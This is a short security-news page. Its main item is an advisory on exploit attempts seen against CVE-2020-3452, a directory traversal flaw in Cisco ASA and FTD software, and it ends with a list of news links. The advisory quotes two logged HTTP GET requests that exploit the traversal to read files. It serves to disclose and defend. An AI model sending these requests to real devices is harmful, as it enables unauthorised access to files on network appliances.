Information Security News
Just a quick reminder: We are continuing to see small numbers of exploit attempts against CVE-2020-3452. Cisco patched this directory traversal vulnerability in its Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software. The exploit is rather simple and currently used to find vulnerable systems by reading benign LUA source code files.
GET /+CSCOE+/translation-table?=mst&textdomain=/%bCSCOE%2b/[email protected]&lang=../ HTTP/1.1
GET /+CSCOE+/translation-table?=mst&textdomain=/+CSCOE+/[email protected]&lang=../
Out honeypot isn't emulating this vulnerability well right now, so we are not seeing followup attacks.
Posted by InfoSec News on Aug 03https://www.theregister.com/2020/08/03/leaky_s3_buckets/
Posted by InfoSec News on Aug 03https://www.cyberscoop.com/taidoor-malware-report-china-cisa-dod-fbi/
Posted by InfoSec News on Aug 03https://siliconangle.com/2020/08/02/travel-management-company-cwt-hands-4-5m-following-ransomware-attack/
Posted by InfoSec News on Aug 03https://www.c4isrnet.com/cyber/2020/08/03/new-england-guardsmen-test-their-skills-in-cyber-yankee-2020/
Posted by InfoSec News on Aug 03https://thehill.com/policy/cybersecurity/510362-house-republicans-introduce-legislation-to-give-states-400-million-for